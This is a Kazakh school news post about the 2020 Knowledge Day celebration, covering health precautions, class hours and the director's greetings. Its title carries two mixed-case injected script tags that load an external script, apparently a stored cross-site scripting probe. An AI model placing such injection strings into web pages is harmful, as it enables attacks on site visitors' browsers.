Білім күні!<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

02.09.2020

1 қыркүйек – Білім күні, таңғажайыпқа толы тамаша мереке. Ұзақ демалыстан кейін балалар өздерінің сыныптастарымен, достарымен және мұғалімдерімен кездеседі. Мереке барлық санитарлық-гигиеналық  нормалар мен талаптардың  сақталуымен өткізілді.  Кіре берісте балаларды медбике қарсы алды, олардың қызуын өлшеді, қолдарын антисептикпен шайған соң оқушылар өздерінің сыныптарына өтті.  1-4 сыныптардың жетекшілері оқушыларына сынып сағатын дайындады. Ал 5-10 сынып оқушылары үшін ZOOM платформасы арқылы қашықтықтағы сынып сағаттары ұйымдастырылды.  Мектеп директоры Исмагулова А.А. барлығын  оқу жылының басталуымен құттықтады. Білім күнімен құттықтаймыз! Ниеттеріңіз бен күш-жігерлеріңіз оқуға және тануға жұмсалсын! Мол табыс, сәттілік, денсаулық, төзімділік пен тамаша нәтижелер тілейміз!

 

 

Просмотров: 833


Пікір қосу



Деректерді қолтаңбаға қосу